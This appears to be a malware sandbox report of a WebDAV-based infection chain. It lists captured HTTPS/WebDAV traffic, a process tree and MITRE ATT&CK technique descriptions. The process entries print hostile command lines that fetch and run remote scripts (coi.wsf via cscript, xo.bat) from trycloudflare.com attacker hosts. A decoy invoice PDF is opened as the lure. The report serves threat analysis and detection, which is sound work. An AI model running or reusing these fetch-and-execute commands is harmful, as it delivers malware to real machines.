2025-03-13 10:07:49 UTC	331	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 10:07:49 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close CF-Ray: 91fab9fd9b50e82b-DFW CF-Cache-Status: DYNAMIC Allow: OPTIONS, HEAD, GET, PROPFIND, DELETE, COPY, MOVE, PROPPATCH, LOCK, UNLOCK dav: 1,2 ms-author-via: DAV Server: cloudflare
2025-03-13 10:07:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	53114	162.159.134.42	443	7752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 10:07:51 UTC	726	OUT	GET /wp-content/uploads/2013/08/draft-invoice-Germany.pdf HTTP/1.1 Host: www.healyconsultants.com Connection: keep-alive sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-13 10:07:51 UTC	178	IN	HTTP/1.1 403 Forbidden Server: cloudflare Date: Thu, 13 Mar 2025 10:07:51 GMT Content-Type: text/html Content-Length: 553 Connection: close CF-RAY: 91faba0cab9b0c03-DFW
2025-03-13 10:07:51 UTC	553	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>cloudflare</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	53119	104.16.230.132	443

Timestamp	Bytes transferred	Direction	Data
2025-03-13 10:07:51 UTC	222	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 79 73 63 61 6c 6c 73 2f 61 6d 73 69 5f 74 72 61 63 65 33 32 2e 61 6d 73 69 2e 63 73 76 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6e 69 73 73 61 6e 2d 73 69 67 6e 61 74 75 72 65 2d 72 73 2d 6e 6f 69 73 65 2e 74 72 79 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND /syscalls/amsi_trace32.amsi.csv HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: nissan-signature-rs-noise.trycloudflare.com
2025-03-13 10:07:52 UTC	226	IN	HTTP/1.1 404 Not Found Date: Thu, 13 Mar 2025 10:07:51 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close CF-Ray: 91faba0cbcd2345c-DFW CF-Cache-Status: DYNAMIC Server: cloudflare
2025-03-13 10:07:52 UTC	418	IN	Data Raw: 31 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 27 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 27 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 3c 70 3e 34 Data Ascii: 19b<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'><html><head> <meta http-equiv='Content-Type' content='text/html; charset=utf-8'> <title>404 Not Found</title></head><body> <h1>404 Not Found</h1> <p>4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	53122	104.16.230.132	443

Timestamp	Bytes transferred	Direction	Data
2025-03-13 10:07:53 UTC	222	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 79 73 63 61 6c 6c 73 2f 61 6d 73 69 5f 74 72 61 63 65 33 32 2e 61 6d 73 69 2e 63 73 76 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6e 69 73 73 61 6e 2d 73 69 67 6e 61 74 75 72 65 2d 72 73 2d 6e 6f 69 73 65 2e 74 72 79 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND /syscalls/amsi_trace32.amsi.csv HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: nissan-signature-rs-noise.trycloudflare.com
2025-03-13 10:07:54 UTC	226	IN	HTTP/1.1 404 Not Found Date: Thu, 13 Mar 2025 10:07:54 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close CF-Ray: 91faba1afd616c81-DFW CF-Cache-Status: DYNAMIC Server: cloudflare
2025-03-13 10:07:54 UTC	418	IN	Data Raw: 31 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 27 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 27 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 3c 70 3e 34 Data Ascii: 19b<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'><html><head> <meta http-equiv='Content-Type' content='text/html; charset=utf-8'> <title>404 Not Found</title></head><body> <h1>404 Not Found</h1> <p>4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.10	53124	104.16.230.132	443

Timestamp	Bytes transferred	Direction	Data
2025-03-13 10:07:54 UTC	211	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 78 6f 2e 62 61 74 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 79 70 69 63 61 6c 6c 79 2d 6e 75 74 2d 70 65 72 73 6f 6e 61 6c 69 7a 65 64 2d 73 79 6e 64 69 63 61 74 69 6f 6e 2e 74 72 79 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND /xo.bat HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: typically-nut-personalized-syndication.trycloudflare.com
2025-03-13 10:07:54 UTC	228	IN	HTTP/1.1 207 Multi-Status Date: Thu, 13 Mar 2025 10:07:54 GMT Content-Type: application/xml; charset=utf-8 Content-Length: 824 Connection: close CF-Ray: 91faba1d7ade69c0-DFW CF-Cache-Status: DYNAMIC Server: cloudflare
2025-03-13 10:07:54 UTC	824	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 0a 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 78 6f 2e 62 61 74 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 32 30 32 35 2d 30 33 2d 31 31 54 32 33 3a 30 39 3a 31 30 5a 3c 2f 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 3c 44 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 6e 67 74 68 3e 33 36 32 31 36 3c 2f 44 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 6e 67 74 Data Ascii: <?xml version='1.0' encoding='UTF-8'?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/xo.bat</D:href><D:propstat><D:prop><D:resourcetype></D:resourcetype><D:creationdate>2025-03-11T23:09:10Z</D:creationdate><D:getcontentlength>36216</D:getcontentlengt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.10	53125	162.159.134.42	443	7752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 10:07:54 UTC	663	OUT	GET /favicon.ico HTTP/1.1 Host: www.healyconsultants.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdf Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-13 10:07:54 UTC	178	IN	HTTP/1.1 403 Forbidden Server: cloudflare Date: Thu, 13 Mar 2025 10:07:54 GMT Content-Type: text/html Content-Length: 553 Connection: close CF-RAY: 91faba1f5fbee595-DFW
2025-03-13 10:07:54 UTC	553	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>cloudflare</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.10	53130	104.16.230.132	443

Timestamp	Bytes transferred	Direction	Data
2025-03-13 10:07:56 UTC	200	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 79 73 63 61 6c 6c 73 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6e 69 73 73 61 6e 2d 73 69 67 6e 61 74 75 72 65 2d 72 73 2d 6e 6f 69 73 65 2e 74 72 79 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND /syscalls HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: nissan-signature-rs-noise.trycloudflare.com
2025-03-13 10:07:56 UTC	226	IN	HTTP/1.1 404 Not Found Date: Thu, 13 Mar 2025 10:07:56 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close CF-Ray: 91faba297e28f078-DFW CF-Cache-Status: DYNAMIC Server: cloudflare
2025-03-13 10:07:56 UTC	396	IN	Data Raw: 31 38 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 27 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 27 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 3c 70 3e 34 Data Ascii: 185<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'><html><head> <meta http-equiv='Content-Type' content='text/html; charset=utf-8'> <title>404 Not Found</title></head><body> <h1>404 Not Found</h1> <p>4
2025-03-13 10:07:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.10	53131	104.16.230.132	443

Timestamp	Bytes transferred	Direction	Data
2025-03-13 10:07:56 UTC	211	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 78 6f 2e 62 61 74 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 79 70 69 63 61 6c 6c 79 2d 6e 75 74 2d 70 65 72 73 6f 6e 61 6c 69 7a 65 64 2d 73 79 6e 64 69 63 61 74 69 6f 6e 2e 74 72 79 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND /xo.bat HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: typically-nut-personalized-syndication.trycloudflare.com
2025-03-13 10:07:57 UTC	228	IN	HTTP/1.1 207 Multi-Status Date: Thu, 13 Mar 2025 10:07:57 GMT Content-Type: application/xml; charset=utf-8 Content-Length: 824 Connection: close CF-Ray: 91faba2cab68e7f3-DFW CF-Cache-Status: DYNAMIC Server: cloudflare
2025-03-13 10:07:57 UTC	824	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 0a 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 78 6f 2e 62 61 74 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 32 30 32 35 2d 30 33 2d 31 31 54 32 33 3a 30 39 3a 31 30 5a 3c 2f 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 3c 44 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 6e 67 74 68 3e 33 36 32 31 36 3c 2f 44 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 6e 67 74 Data Ascii: <?xml version='1.0' encoding='UTF-8'?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/xo.bat</D:href><D:propstat><D:prop><D:resourcetype></D:resourcetype><D:creationdate>2025-03-11T23:09:10Z</D:creationdate><D:getcontentlength>36216</D:getcontentlengt

Target ID:	8
Start time:	06:07:34
Start date:	13/03/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c copy "\\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\coi.wsf" "C:\Users\user\AppData\Local\Temp\coi.wsf" /Y && cscript "C:\Users\user\AppData\Local\Temp\coi.wsf"
Imagebase:	0x7ff73e210000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:07:34
Start date:	13/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff60c8c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	06:07:39
Start date:	13/03/2025
Path:	C:\Windows\System32\cscript.exe
Wow64 process (32bit):	false
Commandline:	cscript "C:\Users\user\AppData\Local\Temp\coi.wsf"
Imagebase:	0x7ff70b5b0000
File size:	161'280 bytes
MD5 hash:	24590BF74BBBBFD7D7AC070F4E3C44FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	06:07:40
Start date:	13/03/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat
Imagebase:	0x7ff73e210000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	06:07:40
Start date:	13/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff60c8c0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	06:07:45
Start date:	13/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdf
Imagebase:	0x7ff7ea9f0000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	06:07:46
Start date:	13/03/2025
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no
Imagebase:	0x7ff7c5d30000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	06:07:47
Start date:	13/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2016,i,15765900008559282355,18116320672109493881,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2032 /prefetch:3
Imagebase:	0x7ff7ea9f0000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	06:07:56
Start date:	13/03/2025
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net use Z: /delete /yes
Imagebase:	0x7ff7c5d30000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

